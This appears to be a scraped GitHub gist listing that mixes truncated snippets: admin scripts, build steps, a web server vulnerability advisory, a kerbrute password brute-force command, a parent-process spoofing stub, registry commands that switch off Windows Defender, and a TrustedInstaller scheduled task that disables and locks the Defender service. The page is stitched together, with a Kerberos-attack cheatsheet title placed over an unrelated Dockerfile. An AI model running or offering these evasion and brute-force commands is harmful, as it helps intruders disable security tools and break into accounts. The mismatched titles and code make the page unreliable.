With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Marshall Hallenbeck Marshall-Hallenbeck
steelcm
/ gist:2558512
Created
April 30, 2012 13:50
Find open ports on windows server using PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PS C:\> netstat -an | select-string -pattern "listening" | |
| TCP 0.0.0.0:80 0.0.0.0:0 LISTENING | |
| TCP 0.0.0.0:81 0.0.0.0:0 LISTENING | |
| TCP 0.0.0.0:135 0.0.0.0:0 LISTENING | |
| TCP 0.0.0.0:383 0.0.0.0:0 LISTENING |
mubix
/ Reset-KrbtgtKeyInteractive.ps1
Created
February 17, 2015 03:13
Microsoft KRBTGT Reset script - https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <#---------------------------------------------------------------------------------------------------- | |
| Release Notes: | |
| v1.4: | |
| Author: Jared Poeppelman, Microsoft | |
| First version published on TechNet Script Gallery | |
| ----------------------------------------------------------------------------------------------------#> | |
| function Test-Command | |
| { |
psignoret
/ Get-AzureADPSPermissions.ps1
Last active
May 21, 2024 09:46
Script to list all delegated permissions and application permissions in Microsoft Entra ID
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF | |
| # FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT. | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" } | |
| <# |
rllola
/ gist:0e46feae5a41cb7d29352a84fb388304
Created
June 3, 2018 11:11
Dogecoin 1.14-branding install ubuntu 18.04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Clone the repo | |
| git clone git@github.com:dogecoin/dogecoin.git | |
| # Pick the correct branch/version | |
| cd dogecoin | |
| git checkout 1.14-branding | |
| # Install dependencies | |
| sudo apt install build-essential libtool autotools-dev autoconf pkg-config libssl-dev |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM mcr.microsoft.com/vscode/devcontainers/go:1.16 | |
| ENV PROTOC_VER 3.11.4 | |
| ENV PROTOC_GEN_GO_VER 1.3.5 | |
| # Base packages | |
| RUN apt-get update --fix-missing && apt-get -y install \ | |
| git build-essential zlib1g zlib1g-dev \ | |
| libxml2 libxml2-dev libxslt-dev locate curl \ | |
| libreadline6-dev libcurl4-openssl-dev git-core \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Vulnerability Description] | |
| - Hydra through 0.1.8 has a NULL pointer dereference and daemon crash when processing POST requests | |
| that lack a 'Content-Length' header. The issue comes from the process_header_end() function, which | |
| calls boa_atoi(), which ultimately calls aoti() on a null pointer. | |
| [Additional Information] | |
| - The Hydra web server is widely used by embedded networking equipment, such as switches, and embedded devices in general. | |
| Because of this fact, it is very difficult to specify device models or vendors that may be impacted by this vulnerability. | |
| Rudimentary scans using Shodan show over 8,000 devices registered broadcasting the "Hydra v0.1.8" server, open to the |
rasta-mouse
/ PPID Spoof & BlockDLLs
Last active
February 29, 2024 04:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
:: Cloud-protection level
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
OlderNewer